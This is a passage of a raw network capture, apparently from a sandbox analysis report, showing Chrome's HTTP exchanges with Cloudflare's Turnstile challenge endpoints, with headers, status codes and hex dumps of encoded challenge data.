                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:39 UTC442INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 15 Jan 2025 02:00:39 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: iHsMpPiXz0U4VRxNnUKp1b3GDRXw5zl7paXULBwqFQMo4zltqt9K9f6mL1hv6OVVDDkOY6Gl++9rHLSric/vVw==$WeRd2+2d87FKt/SzOxQmgg==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902245fe89076a4f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:39 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                  Data Ascii: {"err":100230}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.456738104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:39 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iy HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:39 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:39 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902246009c42c402-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:39 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1b 00 00 00 5e 08 02 00 00 00 5d 23 f8 dd 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR^]#IDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.456739104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:40 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iy HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:40 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:40 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902246048eea41ad-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1b 00 00 00 5e 08 02 00 00 00 5d 23 f8 dd 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR^]#IDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.456740104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:40 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/902245eceb0e5e66/1736906438394/91c3e010fc3651bc618f68ca8ef2d8741d9fcaea910fdc6d25f890264a37241c/c5TG4frDM7SGrCI HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:40 UTC143INHTTP/1.1 401 Unauthorized
                                                                                  Date: Wed, 15 Jan 2025 02:00:40 GMT
                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                  Content-Length: 1
                                                                                  Connection: close
                                                                                  2025-01-15 02:00:40 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 6b 63 50 67 45 50 77 32 55 62 78 68 6a 32 6a 4b 6a 76 4c 59 64 42 32 66 79 75 71 52 44 39 78 74 4a 66 69 51 4a 6b 6f 33 4a 42 77 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gkcPgEPw2Ubxhj2jKjvLYdB2fyuqRD9xtJfiQJko3JBwAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                  2025-01-15 02:00:40 UTC1INData Raw: 4a
                                                                                  Data Ascii: J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.456741104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:42 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 32271
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  CF-Chl-RetryAttempt: 0
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:42 UTC16384OUTData Raw: 76 5f 39 30 32 32 34 35 65 63 65 62 30 65 35 65 36 36 3d 34 61 58 4f 50 6b 5a 33 6a 52 61 32 61 32 6c 61 5a 2d 5a 52 77 37 5a 52 32 33 5a 65 74 32 30 4f 2d 61 32 67 55 32 31 35 4f 41 44 77 39 46 43 32 4f 4f 37 41 76 52 6b 45 58 32 34 47 59 24 71 44 2d 32 49 32 6b 24 4d 32 7a 4f 47 52 4d 70 2d 32 70 58 32 41 32 58 30 4d 52 6c 4f 46 61 6b 32 74 49 4f 2d 57 58 6e 36 32 4a 74 56 32 67 24 6b 67 32 71 37 6b 55 58 55 32 46 74 56 32 46 37 6b 6e 32 71 55 49 65 6a 58 32 32 48 37 32 62 75 32 32 76 33 57 33 32 33 53 58 32 6b 62 4e 50 47 48 66 48 58 4f 5a 73 4d 6c 24 58 6e 44 75 61 69 7a 47 50 2d 41 39 55 54 57 72 54 58 79 4d 32 4f 58 57 65 71 32 5a 39 2d 41 2d 2d 42 4f 6c 34 46 4a 47 33 30 7a 6f 6b 61 6a 5a 34 52 59 49 48 34 35 49 38 48 49 55 6b 45 64 39 67 4b 59 4a
                                                                                  Data Ascii: v_902245eceb0e5e66=4aXOPkZ3jRa2a2laZ-ZRw7ZR23Zet20O-a2gU215OADw9FC2OO7AvRkEX24GY$qD-2I2k$M2zOGRMp-2pX2A2X0MRlOFak2tIO-WXn62JtV2g$kg2q7kUXU2FtV2F7kn2qUIejX22H72bu22v3W323SX2kbNPGHfHXOZsMl$XnDuaizGP-A9UTWrTXyM2OXWeq2Z9-A--BOl4FJG30zokajZ4RYIH45I8HIUkEd9gKYJ
                                                                                  2025-01-15 02:00:42 UTC15887OUTData Raw: 24 31 32 2d 37 32 6a 32 41 32 58 32 43 56 71 6c 7a 75 39 2d 32 2d 32 55 32 64 61 2d 59 5a 33 32 74 4d 32 33 5a 54 32 77 71 4f 58 5a 65 24 76 32 32 61 32 69 61 51 4f 46 2d 32 48 32 58 48 47 69 5a 47 32 39 45 5a 32 32 73 32 4c 37 46 6c 5a 66 32 32 24 39 37 4f 4c 32 6b 24 46 59 32 6a 32 43 24 47 67 34 79 32 32 32 6b 73 4c 32 70 37 4a 67 69 5a 32 54 33 2d 62 32 7a 37 2d 58 2d 24 5a 38 61 4c 4d 32 63 5a 54 32 58 69 32 56 32 4a 32 32 37 46 24 32 61 32 51 70 55 45 32 38 37 32 77 39 66 32 53 37 32 37 2d 4e 59 32 52 41 64 39 54 32 76 24 51 4d 47 6a 32 61 32 37 4f 41 72 32 37 4f 32 37 46 4b 5a 63 4f 43 56 47 6a 5a 67 59 6b 44 47 61 32 5a 32 31 24 6b 52 35 77 32 52 71 39 33 52 5a 37 5a 4f 47 69 48 65 32 7a 4d 5a 58 5a 24 4f 37 4f 52 35 32 4a 79 5a 32 39 66 32 37 4f
                                                                                  Data Ascii: $12-72j2A2X2CVqlzu9-2-2U2da-YZ32tM23ZT2wqOXZe$v22a2iaQOF-2H2XHGiZG29EZ22s2L7FlZf22$97OL2k$FY2j2C$Gg4y222ksL2p7JgiZ2T3-b2z7-X-$Z8aLM2cZT2Xi2V2J227F$2a2QpUE2872w9f2S727-NY2RAd9T2v$QMGj2a27OAr27O27FKZcOCVGjZgYkDGa2Z21$kR5w2Rq93RZ7ZOGiHe2zMZXZ$O7OR52JyZ29f27O
                                                                                  2025-01-15 02:00:42 UTC322INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:42 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 26300
                                                                                  Connection: close
                                                                                  cf-chl-gen: kwKRyerfSEzBjIiO8A6rnZJ8VC3TpOBJ3umIITNyAH4BBQLwg35k/1x9Jk+4L1Nf$vrimMb34HavPafGzbqFB6Q==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 9022460f8c9f17e9-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:42 UTC1047INData Raw: 71 36 75 4f 6c 35 79 79 6c 35 69 65 74 34 2b 61 6e 49 47 47 7a 4d 4b 6a 67 4d 6a 4c 6a 36 54 4d 7a 35 50 57 6b 74 43 58 31 36 66 61 73 35 71 33 33 71 6d 31 73 74 71 33 7a 74 4c 63 34 4c 37 42 33 73 32 33 77 38 79 2b 37 64 4c 55 30 75 6e 51 31 75 33 44 30 63 6e 72 79 63 69 36 37 72 7a 41 74 75 33 52 33 64 58 68 31 64 50 45 43 51 7a 6e 7a 76 76 4e 2b 39 7a 70 34 75 33 50 42 77 7a 35 45 2f 48 5a 43 65 6a 31 39 65 48 66 49 2f 6b 42 38 43 4c 39 41 76 6f 47 2b 51 62 73 38 51 49 69 2f 41 76 77 47 65 38 6c 4f 43 76 33 45 76 6b 73 43 52 59 50 47 66 78 42 4e 43 6c 43 45 6b 4a 44 4b 43 70 51 43 69 55 70 55 31 56 4b 51 7a 49 59 56 31 59 72 4c 52 6f 72 56 43 77 72 57 55 39 4f 57 69 49 35 51 56 34 2b 52 55 78 68 56 6b 4e 43 61 44 46 6f 59 7a 4a 65 62 55 6f 33 64 54 70
                                                                                  Data Ascii: q6uOl5yyl5iet4+anIGGzMKjgMjLj6TMz5PWktCX16fas5q33qm1stq3ztLc4L7B3s23w8y+7dLU0unQ1u3D0cnryci67rzAtu3R3dXh1dPECQznzvvN+9zp4u3PBwz5E/HZCej19eHfI/kB8CL9AvoG+Qbs8QIi/AvwGe8lOCv3EvksCRYPGfxBNClCEkJDKCpQCiUpU1VKQzIYV1YrLRorVCwrWU9OWiI5QV4+RUxhVkNCaDFoYzJebUo3dTp
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 45 6d 73 69 7a 73 62 57 30 6b 71 47 70 6d 63 57 32 6c 4e 71 79 6f 4a 32 59 32 37 32 63 76 63 6a 54 35 4f 75 6b 34 4e 69 73 70 71 6d 6a 36 38 72 48 71 38 6e 47 31 39 44 35 7a 65 7a 71 76 4f 6a 31 37 72 37 73 77 51 43 2b 30 66 4c 7a 35 77 41 4a 32 67 33 46 32 63 76 6e 42 4f 49 47 7a 77 2f 7a 36 64 48 59 37 68 4d 56 36 41 37 77 32 53 58 6a 34 2f 73 56 34 50 30 62 4c 52 7a 73 41 42 30 4e 34 78 4d 43 36 67 73 71 45 6a 6b 4a 39 2f 73 38 4f 78 55 7a 51 6a 5a 41 46 67 4d 69 51 44 59 4a 46 7a 63 71 4a 54 34 62 4b 7a 49 4a 4b 30 38 75 54 6b 4a 48 55 42 52 56 56 54 56 51 4e 6c 39 58 55 7a 35 67 58 46 30 34 55 55 64 43 57 31 39 6b 4b 47 38 77 50 30 56 42 61 31 4a 6c 53 6a 5a 6e 63 46 6b 35 54 48 78 67 54 31 52 54 66 33 46 6a 68 30 52 51 55 56 5a 30 67 55 31 74 53 45
                                                                                  Data Ascii: EmsizsbW0kqGpmcW2lNqyoJ2Y272cvcjT5Ouk4Nispqmj68rHq8nG19D5zezqvOj17r7swQC+0fLz5wAJ2g3F2cvnBOIGzw/z6dHY7hMV6A7w2SXj4/sV4P0bLRzsAB0N4xMC6gsqEjkJ9/s8OxUzQjZAFgMiQDYJFzcqJT4bKzIJK08uTkJHUBRVVTVQNl9XUz5gXF04UUdCW19kKG8wP0VBa1JlSjZncFk5THxgT1RTf3Fjh0RQUVZ0gU1tSE
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 30 74 4c 56 6b 38 2f 51 76 74 6d 33 30 72 75 61 78 4e 72 44 6f 62 48 6f 70 4b 71 6a 34 4e 36 72 34 39 32 75 71 4e 4f 2b 79 72 62 6a 37 63 4c 35 37 4d 6e 34 2f 74 6a 35 41 62 72 6a 7a 64 71 2f 42 66 6e 49 34 2f 66 31 41 38 51 50 78 67 30 4a 42 4d 7a 54 33 2b 59 4e 36 67 33 76 39 39 6a 36 41 50 48 30 33 50 58 79 35 43 59 44 4b 69 62 6d 42 69 45 6d 42 52 41 46 4c 51 38 41 37 68 4d 33 4b 51 45 5a 46 54 59 31 39 76 6b 57 38 68 77 33 2b 52 77 37 2b 41 67 30 43 41 45 33 4e 69 45 70 47 68 46 42 45 55 73 72 52 6c 68 56 46 31 73 6f 57 55 59 62 53 31 31 69 50 6d 4e 41 57 31 56 48 56 43 5a 46 58 6d 64 58 51 54 6c 74 4d 45 49 72 53 47 68 49 53 47 63 78 54 45 51 75 54 33 77 31 58 33 52 77 4f 7a 78 7a 5a 57 4e 53 68 6c 57 4d 65 59 5a 70 67 6c 32 44 63 55 36 51 5a 6e 56
                                                                                  Data Ascii: 0tLVk8/Qvtm30ruaxNrDobHopKqj4N6r492uqNO+yrbj7cL57Mn4/tj5Abrjzdq/BfnI4/f1A8QPxg0JBMzT3+YN6g3v99j6APH03PXy5CYDKibmBiEmBRAFLQ8A7hM3KQEZFTY19vkW8hw3+Rw7+Ag0CAE3NiEpGhFBEUsrRlhVF1soWUYbS11iPmNAW1VHVCZFXmdXQTltMEIrSGhISGcxTEQuT3w1X3RwOzxzZWNShlWMeYZpgl2DcU6QZnV
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 61 75 58 6d 4e 44 56 6f 37 50 54 32 65 4c 44 32 64 33 46 35 64 33 68 79 61 37 68 35 63 33 48 35 65 6e 53 38 72 50 6a 30 74 6a 72 38 39 54 64 41 39 54 53 39 76 6a 31 41 2f 66 55 43 51 59 4a 2f 76 33 4d 44 65 6a 71 30 65 66 51 31 64 4c 71 30 4f 4c 61 39 41 66 61 31 51 34 62 32 75 76 37 38 52 63 56 39 77 49 43 39 79 45 67 4b 77 67 6b 44 79 50 76 42 52 4d 52 44 77 38 6b 42 68 49 57 4b 50 6f 37 4c 77 37 37 45 69 51 36 45 7a 41 32 41 79 6b 4a 53 52 38 46 54 6b 73 6c 50 53 31 56 49 46 4d 6a 4e 42 6b 32 50 46 4d 75 48 6a 55 30 4b 6a 38 35 56 52 77 6a 57 55 63 70 4e 6c 68 75 52 46 42 42 4a 32 31 4e 4d 6a 4a 78 51 6e 55 34 64 47 56 78 65 33 6c 71 56 44 74 51 65 33 73 37 67 59 4e 7a 50 33 32 49 68 49 35 73 61 30 35 77 53 4a 46 55 63 33 47 4e 68 34 52 33 65 33 31 31
                                                                                  Data Ascii: auXmNDVo7PT2eLD2d3F5d3hya7h5c3H5enS8rPj0tjr89TdA9TS9vj1A/fUCQYJ/v3MDejq0efQ1dLq0OLa9Afa1Q4b2uv78RcV9wIC9yEgKwgkDyPvBRMRDw8kBhIWKPo7Lw77EiQ6EzA2AykJSR8FTkslPS1VIFMjNBk2PFMuHjU0Kj85VRwjWUcpNlhuRFBBJ21NMjJxQnU4dGVxe3lqVDtQe3s7gYNzP32IhI5sa05wSJFUc3GNh4R3e311
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 69 75 30 39 4c 54 34 4f 72 66 77 61 62 73 33 61 2f 46 73 65 7a 66 7a 74 54 30 7a 38 2f 61 39 4e 33 31 2b 76 61 38 2b 66 58 37 37 4f 30 41 41 65 6e 54 78 65 77 44 78 2f 37 76 7a 77 44 70 42 67 7a 72 45 4e 55 4f 45 74 41 54 38 76 41 49 45 42 37 2b 44 76 54 76 44 78 45 63 46 67 50 35 42 75 6f 47 49 76 6b 61 45 77 51 73 39 43 59 42 4c 77 38 4a 44 79 6e 36 2b 51 73 30 4c 55 45 2f 52 52 55 30 47 45 67 7a 4f 6b 68 4a 52 41 73 2b 51 6b 68 48 48 55 77 70 45 78 52 59 55 6c 70 5a 58 45 5a 47 48 46 52 5a 56 6c 4e 69 4f 47 5a 6c 5a 55 6f 6a 4a 47 68 57 4a 79 35 6f 4c 79 38 76 63 55 64 71 63 58 4e 61 54 55 56 31 64 44 64 36 65 32 4a 55 62 58 6c 6d 67 6c 39 36 67 33 36 45 68 34 65 4b 52 59 78 4e 52 49 36 55 5a 6c 42 72 6d 46 57 47 6d 35 65 55 68 6f 75 53 6d 35 36 63 6e
                                                                                  Data Ascii: iu09LT4Orfwabs3a/FsezfztT0z8/a9N31+va8+fX77O0AAenTxewDx/7vzwDpBgzrENUOEtAT8vAIEB7+DvTvDxEcFgP5BuoGIvkaEwQs9CYBLw8JDyn6+Qs0LUE/RRU0GEgzOkhJRAs+QkhHHUwpExRYUlpZXEZGHFRZVlNiOGZlZUojJGhWJy5oLy8vcUdqcXNaTUV1dDd6e2JUbXlmgl96g36Eh4eKRYxNRI6UZlBrmFWGm5eUhouSm56cn
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 42 6f 36 58 66 33 73 44 43 72 75 44 70 33 36 6a 69 37 73 71 77 36 4e 6e 53 75 65 6e 67 30 74 33 77 76 74 36 2b 33 64 6a 33 78 75 58 39 2f 4e 66 6e 41 2f 7a 6d 42 4e 2f 31 7a 2b 38 4c 34 75 62 31 36 4e 72 75 2b 74 73 43 34 50 34 44 2b 2f 49 57 48 68 33 63 46 79 37 70 35 78 34 6d 38 66 49 51 37 69 55 32 4a 69 77 50 38 43 63 4d 47 76 6b 59 48 54 55 4e 4e 52 55 31 48 53 4d 37 4b 76 77 6c 42 43 49 4c 4b 6b 4a 43 49 53 6f 4d 44 6b 68 48 4b 53 73 58 53 56 4a 49 45 55 74 58 4d 78 6c 52 51 6a 73 69 55 6b 6b 37 52 6c 6b 6e 52 79 64 47 50 55 4d 39 54 55 56 32 52 31 4e 72 4e 6b 52 55 62 6e 41 2b 62 33 4a 39 57 47 52 41 59 46 46 30 61 45 5a 46 59 34 4a 32 57 58 31 4c 53 6d 36 41 5a 47 52 68 64 46 4e 61 55 6f 64 34 6a 57 68 34 6b 35 4a 33 66 5a 64 36 57 59 46 31 69 6d
                                                                                  Data Ascii: Bo6Xf3sDCruDp36ji7sqw6NnSueng0t3wvt6+3dj3xuX9/NfnA/zmBN/1z+8L4ub16Nru+tsC4P4D+/IWHh3cFy7p5x4m8fIQ7iU2JiwP8CcMGvkYHTUNNRU1HSM7KvwlBCILKkJCISoMDkhHKSsXSVJIEUtXMxlRQjsiUkk7RlknRydGPUM9TUV2R1NrNkRUbnA+b3J9WGRAYFF0aEZFY4J2WX1LSm6AZGRhdFNaUod4jWh4k5J3fZd6WYF1im
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 76 38 76 51 35 4d 48 51 72 38 4c 43 30 73 6a 4b 7a 39 6e 4d 34 74 44 63 39 74 4c 4f 34 4f 54 56 79 65 50 2b 32 74 33 6f 78 39 72 63 37 41 66 71 34 2b 2f 6a 47 65 54 30 36 50 72 73 2b 66 7a 2b 38 50 76 77 2b 76 58 2b 39 50 72 35 42 4f 50 32 2b 67 72 38 44 77 51 4d 4a 77 4c 31 45 43 73 70 42 52 51 4a 45 77 63 59 4d 78 73 4d 48 43 42 46 45 69 41 37 4a 78 77 6c 42 43 4d 58 4b 68 30 62 47 79 73 68 4b 79 49 78 4a 54 63 71 4e 55 38 33 4c 6a 6b 59 4c 69 49 38 48 45 4d 77 51 56 73 7a 4f 55 56 4a 58 54 68 4a 63 6e 45 2b 54 57 63 2f 50 31 41 77 56 30 56 57 53 55 64 4c 56 30 31 62 53 31 35 68 58 31 52 68 51 46 64 63 5a 46 6d 41 54 6d 69 44 66 57 42 74 59 57 64 69 63 46 42 7a 5a 33 4e 70 64 32 70 34 62 58 4e 74 66 56 79 52 63 6f 46 30 71 58 69 45 65 59 2b 41 69 58 32
                                                                                  Data Ascii: v8vQ5MHQr8LC0sjKz9nM4tDc9tLO4OTVyeP+2t3ox9rc7Afq4+/jGeT06Prs+fz+8Pvw+vX+9Pr5BOP2+gr8DwQMJwL1ECspBRQJEwcYMxsMHCBFEiA7JxwlBCMXKh0bGyshKyIxJTcqNU83LjkYLiI8HEMwQVszOUVJXThJcnE+TWc/P1AwV0VWSUdLV01bS15hX1RhQFdcZFmATmiDfWBtYWdicFBzZ3Npd2p4bXNtfVyRcoF0qXiEeY+AiX2
                                                                                  2025-01-15 02:00:42 UTC1369INData Raw: 2f 6a 57 34 37 54 65 2b 64 58 62 41 65 37 65 34 65 2f 46 35 76 72 43 31 65 48 5a 79 4d 33 6e 41 67 55 50 41 68 59 46 41 2b 37 6b 35 75 58 78 2b 74 72 70 39 65 33 63 34 66 73 58 39 65 4c 2b 39 76 49 41 47 68 34 64 47 77 66 39 49 4f 73 52 37 66 45 59 44 53 77 6c 4e 78 6f 49 48 79 41 57 48 45 45 76 48 79 4c 38 42 69 63 6c 41 6a 55 6a 47 6b 30 6b 4c 6c 4a 52 50 43 38 31 4a 68 49 32 53 6c 6c 49 4d 6a 68 64 52 7a 73 2b 56 43 4a 43 51 52 35 48 50 7a 5a 5a 51 45 6c 75 62 55 35 4c 55 55 49 75 55 33 5a 31 5a 55 35 5a 4d 6c 5a 6b 4e 45 64 36 57 32 46 53 50 6d 47 47 68 57 4a 77 51 46 4f 47 59 6d 69 4e 61 6e 68 49 58 34 35 76 64 57 5a 53 64 6d 53 5a 64 6f 52 55 61 35 70 32 66 4b 46 2b 6a 46 78 33 6f 6f 4f 4a 65 6d 61 4b 69 4b 32 4b 6d 47 69 44 72 6f 71 51 74 5a 4b 67
                                                                                  Data Ascii: /jW47Te+dXbAe7e4e/F5vrC1eHZyM3nAgUPAhYFA+7k5uXx+trp9e3c4fsX9eL+9vIAGh4dGwf9IOsR7fEYDSwlNxoIHyAWHEEvHyL8BiclAjUjGk0kLlJRPC81JhI2SllIMjhdRzs+VCJCQR5HPzZZQElubU5LUUIuU3Z1ZU5ZMlZkNEd6W2FSPmGGhWJwQFOGYmiNanhIX45vdWZSdmSZdoRUa5p2fKF+jFx3ooOJemaKiK2KmGiDroqQtZKg


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.456742104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:42 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:43 UTC442INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 15 Jan 2025 02:00:43 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: QCD0Ou+pAQlLmglwheLxfopLtzuhkZZsYAJU2plyDiGy3gmL4amvJVZlM9KsW2m1EJQvMRU0qBsJGv2RpkstiA==$hgg8bpNOaYid5lrA7Fl0Vg==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 90224614bc6ac3eb-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
